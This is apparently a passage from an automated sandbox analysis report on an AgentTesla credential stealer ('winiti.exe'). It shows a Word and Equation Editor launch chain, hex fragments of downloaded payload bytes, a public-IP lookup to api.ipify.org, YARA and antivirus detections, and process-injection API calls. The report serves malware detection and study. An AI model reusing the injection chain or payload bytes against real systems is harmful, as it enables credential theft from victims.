Jul 26, 2024 06:39:08.862147093 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 06:39:08.862183094 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 06:39:08.862216949 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 06:39:08.862253904 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 06:39:08.862747908 CEST	1236	IN	Data Raw: 28 23 00 00 0a 06 6f 24 00 00 0a 02 28 25 00 00 0a 06 6f 26 00 00 0a 02 28 27 00 00 0a 2a 00 00 00 13 30 04 00 83 01 00 00 02 00 00 11 02 17 7d 03 00 00 04 02 03 04 16 28 28 00 00 0a 02 03 04 28 29 00 00 0a 2c 2d 02 16 28 10 00 00 06 02 fe 06 14 Data Ascii: (#o$(%o&('0}(((),-(s"(o$(o&rp[(*o+t[(,@s s-s.o/o#rpo0, (#o#rpo0s_o1o#r+po0
Jul 26, 2024 06:39:08.862782001 CEST	1236	IN	Data Raw: 11 07 6f 5a 00 00 0a 74 22 00 00 01 11 06 16 6a 6f 5b 00 00 0a 11 06 6f 57 00 00 0a 11 05 6f 5c 00 00 0a 11 06 6f 5c 00 00 0a 33 47 11 05 16 6a 6f 49 00 00 0a 11 06 16 6a 6f 49 00 00 0a 11 05 6f 5d 00 00 0a 11 05 6f 5c 00 00 0a 2e 10 11 05 6f 5e Data Ascii: oZt"jo[oWo\o\3GjoIjoIo]o\.o^o^.o]o\3-o_-,o`,o`oa&**`0a(b({("o#oc{("o%o
Jul 26, 2024 06:39:08.862818003 CEST	1236	IN	Data Raw: 00 00 04 72 15 01 00 70 6f 7c 00 00 0a 02 7b 08 00 00 04 20 c8 00 00 00 1f 37 73 7d 00 00 0a 6f 7e 00 00 0a 02 7b 08 00 00 04 1f 17 6f 7f 00 00 0a 02 7b 08 00 00 04 72 25 01 00 70 6f 63 00 00 0a 02 7b 08 00 00 04 17 6f 84 00 00 0a 02 7b 08 00 00 Data Ascii: rpo\|{ 7s}o~{o{r%poc{o{so{ sxoy{szo{{r3po\|{ &s}o~{o{o{# sxoy{
Jul 26, 2024 06:39:08.866990089 CEST	1236	IN	Data Raw: 00 0a 02 1e 1d 1e 1d 73 7a 00 00 0a 28 8f 00 00 0a 02 72 2d 02 00 70 28 7c 00 00 0a 02 72 2d 02 00 70 6f 63 00 00 0a 02 16 28 90 00 00 0a 02 28 91 00 00 0a 2a 1e 02 28 92 00 00 0a 2a ae 7e 11 00 00 04 2d 1e 72 43 02 00 70 d0 04 00 00 02 28 2a 00 Data Ascii: sz(r-p(\|r-poc(((~-rCp(os~~*j(rp~otHj(rp~otHj(rp~otH~Frpot[6rpo*Fr

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49164	172.67.74.152	443	3468	C:\Users\user\AppData\Roaming\winiti.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 04:39:14 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-07-26 04:39:14 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 04:39:14 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8a91b46a58ff5e7e-EWR
2024-07-26 04:39:14 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Target ID:	0
Start time:	00:39:03
Start date:	26/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fc50000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	00:39:05
Start date:	26/07/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:39:08
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Roaming\winiti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\winiti.exe"
Imagebase:	0x1a0000
File size:	671'744 bytes
MD5 hash:	3D33CBDE84D0A1197EC0D459D634473E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:39:11
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Roaming\winiti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\winiti.exe"
Imagebase:	0x1a0000
File size:	671'744 bytes
MD5 hash:	3D33CBDE84D0A1197EC0D459D634473E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	00:39:27
Start date:	26/07/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	97
Total number of Limit Nodes:	1

Executed Functions

Function 00190508 Relevance: 43.2, Strings: 33, Instructions: 1944
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_, xrefs: 00192BED
(, xrefs: 00191631
k, xrefs: 00192133
Q, xrefs: 00191CE2
_, xrefs: 0019289B
_, xrefs: 00192DBE
Ppp, xrefs: 00191835
7, xrefs: 0019176F
_, xrefs: 00192302
k, xrefs: 001926C0
, xrefs: 00191E81
k, xrefs: 001922F8
, xrefs: 0019207F
_, xrefs: 001926CA
k, xrefs: 00192DB4
d, xrefs: 00191D95
(, xrefs: 00191638
, xrefs: 00191540
&, xrefs: 001915EC
i, xrefs: 00191DF5
k, xrefs: 00192891
g, xrefs: 00191547
-, xrefs: 001918DC
7, xrefs: 00191A39
_, xrefs: 0019213D
7, xrefs: 00191BC7
k, xrefs: 00192A30
d, xrefs: 001915E5
C, xrefs: 00191973
k, xrefs: 001924C3
_, xrefs: 001924CD
_, xrefs: 00192A3A
k, xrefs: 00192BE3

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID:
String ID: $ $ $&$($($-$7$7$7$C$Ppp$Q$_$_$_$_$_$_$_$_$d$d$g$i$k$k$k$k$k$k$k$k
API String ID: 0-3360338523
Opcode ID: eeb13e85c0ef51da30507e93522d83ee96b22dde3696adf283c5018134da68d7
Instruction ID: 22a7f08a5953e68e8d2bccd3807c6d1ee79d11fb0b70aedfb7be348e9981031d
Opcode Fuzzy Hash: eeb13e85c0ef51da30507e93522d83ee96b22dde3696adf283c5018134da68d7
Instruction Fuzzy Hash: F9132930A10715CFCB26EF74C894B99B7B2BF99300F508A99E449AB351DB71AE85CF41

Function 0019117E Relevance: 43.2, Strings: 33, Instructions: 1929
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_, xrefs: 00192BED
(, xrefs: 00191631
k, xrefs: 00192133
Q, xrefs: 00191CE2
_, xrefs: 0019289B
_, xrefs: 00192DBE
Ppp, xrefs: 00191835
7, xrefs: 0019176F
_, xrefs: 00192302
k, xrefs: 001926C0
, xrefs: 00191E81
k, xrefs: 001922F8
, xrefs: 0019207F
_, xrefs: 001926CA
k, xrefs: 00192DB4
d, xrefs: 00191D95
(, xrefs: 00191638
, xrefs: 00191540
&, xrefs: 001915EC
i, xrefs: 00191DF5
k, xrefs: 00192891
g, xrefs: 00191547
-, xrefs: 001918DC
7, xrefs: 00191A39
_, xrefs: 0019213D
7, xrefs: 00191BC7
k, xrefs: 00192A30
d, xrefs: 001915E5
C, xrefs: 00191973
k, xrefs: 001924C3
_, xrefs: 001924CD
_, xrefs: 00192A3A
k, xrefs: 00192BE3

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID:
String ID: $ $ $&$($($-$7$7$7$C$Ppp$Q$_$_$_$_$_$_$_$_$d$d$g$i$k$k$k$k$k$k$k$k
API String ID: 0-3360338523
Opcode ID: 4ba9fe2c9c28a868ffdb1c3aeadcb32295c2417a27b0aca4d9204d57a89cf28e
Instruction ID: 195c45f6bbaddc9eaec797f015495bd9c0bd6acc34e2e3a4f83899b0b467ac4d
Opcode Fuzzy Hash: 4ba9fe2c9c28a868ffdb1c3aeadcb32295c2417a27b0aca4d9204d57a89cf28e
Instruction Fuzzy Hash: 7D131930A10715CFCB26EF74C894B99B7B2BF99300F508A99E4496B361DB71AE85CF41

Function 0019EE05 Relevance: 1.8, APIs: 1, Instructions: 326
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0019F0D7

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 76c0206a4b3b96db36563bb4af8e365d2b24e3846d161eda07c5b8f169c436b5
Instruction ID: c5d28028bafc11bccd779d945f1a08f7d4b9d82496c72afc7e0709da20e0b60b
Opcode Fuzzy Hash: 76c0206a4b3b96db36563bb4af8e365d2b24e3846d161eda07c5b8f169c436b5
Instruction Fuzzy Hash: 60C12671D002699FDF24CFA8C845BEDBBB1BF09300F1495AAE819B7250DB749A85CF94

Function 0019EE10 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0019F0D7

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 251af293f03a18269dd0283f51c9845fba83799244a483a6294a100bf6cb7caa
Instruction ID: 92e37e067fef0a3abcf201d16e0e28fa0c59dfeb0c96768c458ea63cf7c58026
Opcode Fuzzy Hash: 251af293f03a18269dd0283f51c9845fba83799244a483a6294a100bf6cb7caa
Instruction Fuzzy Hash: C7C12771D002299FDF24CFA8C845BEDBBB1BF09304F1095AAD819B7250DB749A85CF94

Function 0019EA70 Relevance: 1.6, APIs: 1, Instructions: 122
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019EB4B

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6504cf33d6d0cdd04d91da2043b1a882e3e4fb4e13ae37e90d6679b8af5aeae7
Instruction ID: 2810a6313dc21392f8705acd17258218503b0ed0db6d83f580a93160d6facec7
Opcode Fuzzy Hash: 6504cf33d6d0cdd04d91da2043b1a882e3e4fb4e13ae37e90d6679b8af5aeae7
Instruction Fuzzy Hash: 3941B9B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE815BB210D335AA45CF64

Function 0019EA78 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019EB4B

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f70c1a74b562b508531a0b4c36993c4f4d6281f7810872f1147272910d99bd96
Instruction ID: f76834834fb29d05d12a142b2dcdd4d69ad0e047e9de38700700ee2505ead118
Opcode Fuzzy Hash: f70c1a74b562b508531a0b4c36993c4f4d6281f7810872f1147272910d99bd96
Instruction Fuzzy Hash: 6141A9B4D002589FCF10CFA9D984AEEFBF1BB49314F24942AE815BB250D334AA45CF64

Function 0019EBD1 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019EC8A

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f8ad8524c380b6c320c8c996c5d9ccc7250e41319131780d6c101742c2836571
Instruction ID: 1086eae62cf71a0d4133623d744ae37aac5bb3ecfa64b15fc4ca04bd2de3bef1
Opcode Fuzzy Hash: f8ad8524c380b6c320c8c996c5d9ccc7250e41319131780d6c101742c2836571
Instruction Fuzzy Hash: 0441B9B8D002589FCF10CFAAD984AEEFBB1BF49314F24942AE815B7240C735A945CF65

Function 0019EBD8 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019EC8A

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9da377a04fe8c60ec779fd092aba985c6f1018c12fb001bdab6edd33b4a8f28a
Instruction ID: 3341815131016006d42dde8a965556a762567b32123837d7a1f2d212a36d8f55
Opcode Fuzzy Hash: 9da377a04fe8c60ec779fd092aba985c6f1018c12fb001bdab6edd33b4a8f28a
Instruction Fuzzy Hash: AA41AAB5D002589FCF10CFAAD984AEEFBB1BF49314F20942AE815B7200D735A945CF65

Function 0019E948 Relevance: 1.6, APIs: 1, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0019E9FA

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6ba2b2c8a772dd74399051af84fbec09df423bd5bad4b090e89b7073b4b02daa
Instruction ID: 608f30b0d2654cc4992c9dc5368d1e61e8e2078e7004b9a8dd2bd73d1955f529
Opcode Fuzzy Hash: 6ba2b2c8a772dd74399051af84fbec09df423bd5bad4b090e89b7073b4b02daa
Instruction Fuzzy Hash: 0441AAB8D002589FCF10CFA9D984AEEFBB1BB49314F20941AE815BB314D735A946CF64

Function 0019E950 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0019E9FA

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2a73d6dc2e08c1d0ffa1ad59a51c35bfa6f5a30a6d47ee48a5ef61eabc2285ab
Instruction ID: 87d2bf255cb95b1416c9a30a2f94ede05fc9916d80f0e8ccc18294c73fcab035
Opcode Fuzzy Hash: 2a73d6dc2e08c1d0ffa1ad59a51c35bfa6f5a30a6d47ee48a5ef61eabc2285ab
Instruction Fuzzy Hash: A84199B8D002589BCF10CFA9D984AAEFBB1BB49314F20942AE815B7314D735A945CFA5

Function 0019E818 Relevance: 1.6, APIs: 1, Instructions: 100
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0019E8CF

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 64c58465b9d605ef3f44dc1b4337c736a4cfc9bee6d980105a32298e09208be9
Instruction ID: bc55ce25c9be89136c3321b9aec4b12fc3533a2aaa0c636aa49ec762d6b7c650
Opcode Fuzzy Hash: 64c58465b9d605ef3f44dc1b4337c736a4cfc9bee6d980105a32298e09208be9
Instruction Fuzzy Hash: 1D41BAB4D002589FCF10CFA9D984AEEBBF1AB49314F24802AE419B7244D739A949CF54

Function 0019E820 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0019E8CF

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ea1d686e596191351cc6d7f37cfc5824cbf072443be1ff5adaad8882e0c82357
Instruction ID: 52a3dbf56e82a2e9110070c90da2bfe90aacea11dbe069b6c97c4b5b4a9d4b42
Opcode Fuzzy Hash: ea1d686e596191351cc6d7f37cfc5824cbf072443be1ff5adaad8882e0c82357
Instruction Fuzzy Hash: 2241AAB4D002589FCF10CFA9D984AEEFBF1AF49314F24842AE419B7244D739A989CF54

Function 0019E730 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0019E7AE

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e95d7c34337d1993ccb858dedbab2b4af34da541b930882332faeaa2cdf33b74
Instruction ID: 495ea42eb024a29f01592e1c4325746602f1741ac99d91c577e6cab7b05e9e5d
Opcode Fuzzy Hash: e95d7c34337d1993ccb858dedbab2b4af34da541b930882332faeaa2cdf33b74
Instruction Fuzzy Hash: 8331BAB4D002189FCF14CFAAD984AAEFBB5EF49314F24942AE815B7300C735A905CF95

Function 0019E729 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0019E7AE

Memory Dump Source

Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_190000_winiti.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 73b4302f46ff01b6dd0755266cbd2df02211bf2404abc0426d6c76d4399e7359
Instruction ID: d078110c6af550df877bdbee0d239ba89dafb21c104e44ff03e679190864a3d4
Opcode Fuzzy Hash: 73b4302f46ff01b6dd0755266cbd2df02211bf2404abc0426d6c76d4399e7359
Instruction Fuzzy Hash: B431C9B8D002189FCF14CFA9D984AAEFBB1BF49314F24846AE815B7340C734A905CF95

Function 005B081D Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

(, xrefs: 005B09E7

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 4ef9def90a57e9cd166aa0193217dcb5b3b794db15f0b26605fff2887f41ebe1
Instruction ID: 0e34c00bbe3995b197d68ffec9e821075c221bfb18c41731744ceab4632b8f7b
Opcode Fuzzy Hash: 4ef9def90a57e9cd166aa0193217dcb5b3b794db15f0b26605fff2887f41ebe1
Instruction Fuzzy Hash: 5CF09235949218CFEB65CF64C884BEEBBB5FB08314F2495D9D409A3292C735AE85DF00

Function 0013D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374866922.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13d000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
Instruction ID: 03c992a4348eac45ac72be90a8f484c26676ca76a0b44247905b8b03d1444a50
Opcode Fuzzy Hash: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
Instruction Fuzzy Hash: 5721C2B5604240EFDB16CF14F9C0B26BBA5FB84314F24C5A9E8494B256C736D84ACB61

Function 0013D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374866922.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13d000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
Instruction ID: 4d967bc66fc9d1a25c83f1b7f0c5bf5a08a76d64203610675017b6464fe62645
Opcode Fuzzy Hash: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
Instruction Fuzzy Hash: 8721B0B5604240EFDB19CF24F8C4B26BB65EB84B14F34C5A9E8494B256C736D84BCBA1

Function 005B0632 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb612a4e9ff76d4f0b1a4928f1fe2f18f3dc82bc285ed1e3c904285b690e4461
Instruction ID: 02159a892244f8b6b5fb19ff58be3237e464b76ab5365d78a500a081d8152694
Opcode Fuzzy Hash: cb612a4e9ff76d4f0b1a4928f1fe2f18f3dc82bc285ed1e3c904285b690e4461
Instruction Fuzzy Hash: 02317834A48218DFDB21CF24CC94BE9BBB5BF0A300F1440EAD509A7291DB30AA86DF01

Function 0013D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.374866922.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_13d000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
Instruction ID: c93a144368a3656922636856f90339f43b112a12ea4bafa1108d28c1e8bd612a
Opcode Fuzzy Hash: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
Instruction Fuzzy Hash: 502171755083809FCB06CF14E994711BF71EB46714F28C5DAD8498F266C33AD85ACB62

Function 005B09FC Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56b9996c4d5978168f4e48ac37df4141488cb3a26bfdad62f9c26f777a70d14
Instruction ID: 60382f607a6e068a099d74d3018510192017cdaa1c9798f8e59e23d9bc2f01cd
Opcode Fuzzy Hash: d56b9996c4d5978168f4e48ac37df4141488cb3a26bfdad62f9c26f777a70d14
Instruction Fuzzy Hash: 84213879908358CFDB54DF64C884AE9BBB9BF1A300F14A4D6D40D9B292CB30AE85CF50

Function 005B0766 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcfb7b397cebffb4f61a7193d17a6a31cc28db029cece09ecbddbaa5ffcf570
Instruction ID: 637751b7e83883d2fd2611727251a17cb8ba405bc17b811a33b9af44487f6fb8
Opcode Fuzzy Hash: 2dcfb7b397cebffb4f61a7193d17a6a31cc28db029cece09ecbddbaa5ffcf570
Instruction Fuzzy Hash: CC21B778909218CFDB64CF54D980BEDBBB8BB09301F24A5D9D50DA7292DB30AE85DF40

Function 005B0FAD Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e912ff273967d8a631cffc6a8f2954ac10be48709c240bde38b4277ce3db4175
Instruction ID: 6c7ceea806292f3040a9a4c7ae70513c1eb87595cd7b4891d6bc3a1966e34bec
